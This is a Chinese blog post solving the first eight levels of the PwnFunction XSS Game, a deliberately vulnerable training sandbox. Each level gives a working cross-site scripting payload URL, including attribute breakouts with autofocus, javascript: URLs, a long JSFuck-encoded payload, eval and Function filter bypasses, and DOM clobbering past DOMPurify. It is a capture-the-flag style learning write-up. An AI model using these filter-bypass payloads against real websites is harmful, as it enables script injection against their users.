XSS Game前八关

整不会了2024-08-17 16:52

分享一个XSS游戏的链接

XSS Game

第一关:

这边有一个innerHTML属性,我们查看官方文档

我们找到了它存在的漏洞,直接利用

复制代码 
https://sandbox.pwnfunction.com/warmups/ma-spaghet.html?somebody=<img src=1 onerror="alert(1337)">

第二关:

复制代码 
https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=aaa";alert(1337);"

第三关:

我第一个想到的就是

复制代码 
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaaaaa" onclick="alert(1)

用到onclick,这个没有满足不能与用户交互的要求,但是其他都符合

复制代码 
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaaaaa" onfocus="alert(1337)

用onfocus会有一点改进,但是在触发的一瞬间还是需要用户聚焦

复制代码 
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaaaaa" onfocus=alert(1337) autofocus="

这个完美符合要求,它会自动聚焦

第四关:

复制代码 
https://sandbox.pwnfunction.com/warmups/ricardo.html?ricardo=javascript:alert(1337)

第五关:

它对很多字符进行了过滤,跟前面第一关一样用到了inner HTML属性,所以我们往img标签想

但是它对()进行了过滤,所以我们想给它的()符号进行编码,但是解析的话还是会被识别,所以我们会用到location属性先将它看作是字符串等绕过了程序再进行解码

复制代码 
https://sandbox.pwnfunction.com/warmups/thats-hawt.html?markassbrownlee=<img src=1 onerror=location="javascript:alert%281337%29">

第六关:

它将我们的数字字母都过滤了,我们试试能不能编码绕过,由于需要经过底层js过滤(需要用到jsfuck编码),再在地址栏输入所以需要url编码

我们把拿到的jsfuck编码再进行url编码

复制代码 
https://sandbox.pwnfunction.com/warmups/ligma.html?balls=%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%5b(%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%5d((!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(%2b%5b!%5b%5d%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b!%2b%5b%5d%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(%2b(!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%2b%5b%2b!%2b%5b%5d%5d))%5b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(%5b%5d%2b%5b%5d)%5b(%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%5d%5b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b((%2b%5b%5d)%5b(%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(%5b%5d%5b%5b%5d%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%2b%5b%2b!%2b%5b%5d%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%5d(!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%2b%5b!%2b%5b%5d%2b!%2b%5b%5d%5d)%2b(!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d)()((!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%5d%2b(!!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%2b%5b%5d)%5b%2b!%2b%5b%5d%2b%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d%2b%5b%2b!%2b%5b%5d%5d%2b%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b%5b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(%5b%2b%5b%5d%5d%2b!%5b%5d%2b%5b%5d%5b(!%5b%5d%2b%5b%5d)%5b%2b%5b%5d%5d%2b(%5b!%5b%5d%5d%2b%5b%5d%5b%5b%5d%5d)%5b%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%2b(!%5b%5d%2b%5b%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%5d%5d)%5b!%2b%5b%5d%2b!%2b%5b%5d%2b%5b%2b%5b%5d%5d%5d)

主要是先进行jsfuck编码再进行url编码,最后完成

第七关:

所以我们就当作三个都过滤了

第一种方法:利用匿名函数加大写绕过

为什么要刚开始写成大写后面又利用source.toLowerCase()转成小写呢,因为刚开始大写是要绕过正则表达式,后面又转换成小写是因为js严格区分大小写,就算绕过了也无法执行。

复制代码 
https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

第二种方法:利用parseInt和tostring方法

打开控制台工具试验一下

复制代码 
https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=eval(8680439..toString(30))(1337)

第三种方法:利用hash函数,hash函数后面的值不会被认为是传参,所以可以绕过

复制代码 
https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=eval(location.hash.slice(1))#alert(1337)

第八关:

setTimeout(ok, 2000)中的ok可以接收一个函数或者字符串,如果我们能够向ok这个变量注入可执行的payload,那么也就能成功弹框

通过向HTML注入DOM元素,来实现操作JavaScript变量首先,要构造一个变量ok,我们可以通过创建一个id=ok的DOM元素来实现,比如<div id="ok"></div>

在控制台试验一下,可以用属性值得到标签名和属性名

然后,ok需要接受一个字符串作为值,而在对<a>标签调用toString()方法时,会返回属性href的值,所以,我们可以选择<a>标签作为构造对象

href的值要遵守protocol:uri的格式,然而,在href里直接使用javascript:协议是不行的

通过查看DOMPurify的源码可以发现,它支持的合法的协议有mailto, tel, xmpp等等,随便选择一个即可,这里我就用mailto了。

复制代码 
https://sandbox.pwnfunction.com/warmups/ok-boomer.html?boomer=%3Ca%20id=ok%20href=mailto:alert(1337)%3E
相关推荐
AskHarries5 分钟前
Workspace:文件系统、项目上下文和执行边界
java·服务器·前端
Aphasia31120 分钟前
从内存模型看深浅拷贝
前端·javascript·面试
IT策士1 小时前
第45篇 k8s之实战:将 Web 应用迁移到 Kubernetes(下)
前端·容器·kubernetes
你怎么知道我是队长1 小时前
CRC校验C语言实现-CRC8、CRC16、CRC16的直接计算法、查表法
c语言·前端·javascript
Rain5091 小时前
mini-cc 终端 UI:用 React 写 CLI 是什么体验
前端·人工智能·react.js·ui·架构·前端框架·ai编程
wu8587734572 小时前
向量数据库不是银弹:从枚举漏检到 ReACT 多轮召回的实践路径
前端·数据库·react.js
古怪今人2 小时前
[前端]HTML盒模型与尺寸,标准文档流,块级元素、内联元素和行内块,CSS选择器
前端·css
小雨下雨的雨2 小时前
基于鸿蒙PC Electron框架技术完成的表单验证技术详解
前端·javascript·华为·electron·前端框架·鸿蒙
提子拌饭1332 小时前
饮料含糖量查询应用 - 鸿蒙PC用Electron框架完整实现
前端·javascript·华为·electron·前端框架·鸿蒙
JustHappy2 小时前
古法编程秘籍(五):什么是进程和线程?从软件到 CPU 的一次完整旅程
前端·后端·代码规范
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04Codex 下载安装指南:Windows 和 macOS 官方版下载05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06CC-Switch 下载、安装与使用配置指南【2026.5.29】07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法